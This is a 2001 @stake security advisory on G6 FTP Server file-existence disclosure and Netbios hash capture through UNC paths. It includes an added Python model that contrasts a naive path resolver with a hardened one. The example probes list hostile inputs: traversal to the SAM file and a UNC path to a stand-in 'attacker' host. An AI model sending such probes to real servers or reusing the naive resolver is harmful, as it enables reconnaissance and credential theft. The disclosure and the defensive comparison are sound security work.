OSEC

From: @stake advisories (@stake)
Date: Tue Apr 03 2001 - 15:57:13 CDT


    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

                                    @stake, Inc.
                                  www.atstake.com

                           Security Advisory Notification

    Advisory Name: G6 FTP File Existence Disclosure and Netbios Hash Retrieval
      Release Date: 04/03/2001
       Application: G6 FTP Server v2.0 (exploit and example); other
                    applications vulnerable to the Netbios hash retrieval
                    attack.
                    [Note: Application has been renamed to BPFTP Server v2.10]
          Platform: Microsoft Windows 9x, NT, 2000, ME
          Severity: Enumeration of files and directories of the system,
                    Windows Netbios credentials sent over the Internet to
                    arbitrary hosts.
            Author: Rob Beck [rbeck@atstake.com]
    Vendor Status: Vendor has fixed version available for download
               CVE: CAN-2001-0263, CAN-2001-0264
         Reference: www.atstake.com/research/advisories/2001/a040301-1.txt

    Executive Summary:

    I. Gene6's G6 FTP Server fails to properly restrict access to files
    outside of the FTP root directory when handling the 'SIZE' and 'MDTM'
    FTP commands, if the 'show relative paths' option is not set. Because
    these commands answer differently for a path that exists and for one
    that does not, they can be used to gather useful information about the
    directory structure of the host system.

    II. Many software vendors are enabling features within their products to
    take advantage of networked computers and shared resources either on a
    local area network (LAN) or across the Internet. Almost all win32
    applications now support the use of universal naming convention
    (UNC) paths to access resources and files between machines running
    Windows. Many of these application vendors fail to take into account the
    security threat that arises should their features be misused or their
    safeguards circumvented.

    Overview:

    An attacker, through the use of 'trivial' exploits, may be able to
    elevate the threat level of an attack by using features in Windows
    applications or service software that allow a UNC path to be supplied.
    By incorporating remote share paths into their attack methods, attackers
    may be able to force a server into creating an outbound connection to a
    hostile server. When the server attempts to access the remote resource,
    the hostile server is able to capture the victim computer's Windows
    (Netbios) authentication credentials. These credentials could then be
    used for a more critical attack on the host system.
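
    The following is an added example, not part of this advisory and not
    code from the G6/BPFTP server. It models the two behaviours described
    above in one place: a SIZE handler whose naive path resolution answers
    '213 <size>' or '550' for any path on the host (file-existence
    disclosure), and which would hand a UNC argument to the operating
    system (triggering the outbound SMB authentication that leaks the
    server's credentials), beside a hardened resolver that refuses UNC and
    drive-qualified arguments and confines the normalised path to the FTP
    root. MDTM has the same 213/550 reply shape, so the same resolver covers
    it. The FTP root 'C:\ftproot', the in-memory file table and the host
    name 'attacker' are constructed for the example.

```python
"""Added example (not part of the @stake advisory or of the G6/BPFTP code):
models how an FTP SIZE handler leaks file existence when user-supplied
paths are joined onto the FTP root naively, and how a hardened resolver
confines the path to the root and refuses UNC paths before the OS touches
them. The FTP root, the in-memory file table and the host name below are
constructed for the example."""

import ntpath

FTP_ROOT = r"C:\ftproot"  # assumed FTP root; constructed for this example

# Constructed stand-in for the server's disk: canonical Windows path -> size.
# Nothing here is read from a real file system.
FAKE_FS = {
    r"C:\ftproot\pub\readme.txt": 1024,
    r"C:\WINNT\win.ini": 555,
    r"C:\WINNT\repair\sam": 24576,
}
_FS_CI = {k.lower(): v for k, v in FAKE_FS.items()}  # NTFS lookups ignore case


def is_unc(path):
    """True for \\\\host\\share\\... or //host/share/... style paths."""
    return path.startswith(("\\\\", "//"))


def vulnerable_resolve(root, arg):
    """Naive resolution: join the client's argument onto the root and
    normalise. ntpath.join discards the root entirely when arg carries a
    drive letter or is UNC, and normpath collapses '..', so the result can
    point anywhere on the host (or at a remote share)."""
    return ntpath.normpath(ntpath.join(root, arg))


def safe_resolve(root, arg):
    """Hardened resolution: UNC and drive-qualified arguments are rejected
    outright, leading slashes mean 'relative to the FTP root', and the
    normalised result must still lie under the root."""
    if is_unc(arg):
        raise PermissionError("UNC path rejected")
    rel = arg.lstrip("/\\")
    if ntpath.splitdrive(rel)[0]:
        raise PermissionError("drive-qualified path rejected")
    root_norm = ntpath.normpath(root)
    full = ntpath.normpath(ntpath.join(root_norm, rel))
    # commonpath checks containment without string-prefix mistakes
    # (C:\ftproot2 must not pass as being inside C:\ftproot).
    if ntpath.commonpath([root_norm.lower(), full.lower()]) != root_norm.lower():
        raise PermissionError("path escapes the FTP root")
    return full


def handle_size(arg, resolver, root=FTP_ROOT):
    """Return the reply line the server would send for 'SIZE <arg>'."""
    try:
        path = resolver(root, arg)
    except PermissionError:
        return "550 Permission denied."
    if is_unc(path):
        # A real server would hand this path to the OS, which opens an SMB
        # session to the named host and authenticates with the server's
        # own Windows credentials; that is the hash-retrieval attack.
        host = path.replace("/", "\\").split("\\")[2]
        return "550 (outbound SMB connection to %s attempted)" % host
    size = _FS_CI.get(path.lower())
    return "213 %d" % size if size is not None else "550 No such file."


def probe(args, resolver):
    """Run a list of SIZE arguments through a resolver; returns {arg: reply}."""
    return {a: handle_size(a, resolver) for a in args}


if __name__ == "__main__":
    # Constructed probe set: one legitimate file, two escapes, one UNC path.
    PROBES = [r"pub\readme.txt", r"C:\WINNT\win.ini",
              r"..\WINNT\repair\sam", r"\\attacker\share\x"]
    for name, resolver in (("vulnerable", vulnerable_resolve),
                           ("hardened", safe_resolve)):
        print("--", name)
        for arg, reply in probe(PROBES, resolver).items():
            print("  SIZE %-24s -> %s" % (arg, reply))
```

    With the vulnerable resolver the 213/550 split tells the client
    exactly which paths exist anywhere on the host, and the UNC argument
    reaches the OS. The hardened resolver returns the same '550 Permission
    denied.' for traversal, drive letters and UNC alike, so nothing about
    files outside the root is revealed and no outbound SMB session is ever
    opened.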

    Vendor Response:

    The vendor was very responsive and has made a fixed version of the
    software available within a week of being notified of the issues.

    A new fixed version of the software is available, BPFTP Server v2.10
    (note the software name change). It can be downloaded from:

    http://www.bpftpserver.com/download.html

    Advisory Reference:

    http://www.atstake.com/research/advisories/2001/a040301-1.txt

    ** The advisory contains additional information. We encourage those
    ** affected by this issue to read the advisory.
    **
    ** All vulnerability database maintainers should reference the above
    ** advisory reference URL to refer to this advisory.

    Advisory policy: http://www.atstake.com/research/policy/
    For more advisories: http://www.atstake.com/research/index.html
    PGP Key: http://www.atstake.com/research/pgp_key.asc

    Copyright 2001 @stake, Inc. All rights reserved.

    -----BEGIN PGP SIGNATURE-----
    Version: PGP 7.0

    iQA/AwUBOso3j1ESXwDtLdMhEQJpEQCfe+A7+6/21ENQaPKbreUQYccrQ7YAn23b
    pE4oQFrFeEd8/0L3+RAxrp2c
    =Ngkz
    -----END PGP SIGNATURE-----